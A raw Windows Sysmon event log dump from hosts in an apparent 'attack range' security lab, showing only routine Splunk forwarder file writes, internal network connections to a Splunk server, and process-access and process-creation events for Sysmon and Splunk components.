Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D1F6E9784AEA0ABD12A24AAADBD6BC9,SHA256=1524EBCBE3E349131E98470A150242A7C12BB501A20B98EC3A5156A3D30176E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217286Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:39.478{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBEB16DF092202AE567690B425455217,SHA256=13DB5FFBA785CEF8B2D6CC2CD2B607847F0C640002CB3A8551C39A06723A5464,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289436Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:40.686{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F878759FE270D4CAD0D34F4FDCF9755,SHA256=47F67A3CB69E9F38A4197F9C4B9599987F7B114CC3CCE46AE9499168C4ED7064,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217287Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:40.494{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C66BC457FBA5DD5AB3C87B41AB01F4C7,SHA256=BCE368595031AFEC4519F25E2A06D5141773F1CEC6AFF56325E50C3FDAFEAC37,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289438Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:39.360{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53533-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000289437Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:41.701{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8702EB7D1F0F09D0269162971F724488,SHA256=ECA43CC9FE4055C52EEA2CED36BAC65D1FBD584E3B7F1C61E19A69028D6E8E09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217288Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:41.509{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5BA4CB7C468E234288B87A0607CA081,SHA256=420E1E28BFD902A9BBBAEFCDB5E994A2BE64D51B6392DFC6DD9094EBC680B5E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289439Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:42.720{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88D519F3BFC7D490E48CF9B53B22F735,SHA256=9B213ED3C6C08E6364FEE718E666DA9878A67EFA266AB758A73AB09D150573F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217290Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:42.525{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1828E6202ECF1EDB1963F6BC32736D85,SHA256=30EC786D68A94861D17FCFCFCBC8771B5844D7310C7109B6572790986FE1001B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217289Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:39.674{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51386-false10.0.1.12-8000- 23542300x8000000000000000289441Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:43.756{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB812826611827F4FEED4EE78A760C73,SHA256=82E7D36BB09021BACCBE751BCC6D470E8597DA985917868CC419DB00B5D2CFDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217291Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:43.541{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6256D83748F61749BFF262824756BA0D,SHA256=6D932796185B9D06EE02EC50D74428B9B8E150E0B646A67C5BA60F0FDBC379F2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289440Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:40.601{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53534-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289442Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:44.803{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C40FF11D03BB0C60CAC7ECCE2ECCBA0,SHA256=3955C3B4F08899CBBFBCC4504EA953E0063478D1F96F0221B8CDE68F53A1474C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217304Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:44.994{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217303Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:44.994{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217302Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:44.994{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217301Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:44.994{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217300Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:44.994{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217299Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:44.994{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217298Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:44.994{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217297Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:44.994{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217296Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:44.994{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217295Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:44.994{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1274-6216-7304-000000003902}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217294Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:44.994{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1274-6216-7304-000000003902}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217293Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:44.994{4F8D34B0-1274-6216-7304-000000003902}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217292Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:44.556{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF8317D4686D5E62EABB760E4C49AF84,SHA256=3D5211C78C91901EF940938D546D93F5632F29869A2CCC56B1BC9F05D34948ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217320Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:45.822{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BB65AC34864D8D1F042EC20EBE48A42,SHA256=C85A24D0FA791CD54EBB9D7E1DDE9C1D43816ECFA0A6B8C89CDD876A4451C45F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289443Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:45.818{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=830FD22F667BF0B7AFBBB87B5B67D9C8,SHA256=26D196948D3EAC8B16DBA1C70F1E6BCDC9DF343BDDD12BEEBE7A4EE45ECE89D8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217319Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:45.509{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1275-6216-7404-000000003902}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217318Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:45.509{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217317Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:45.509{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217316Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:45.509{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217315Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:45.509{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217314Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 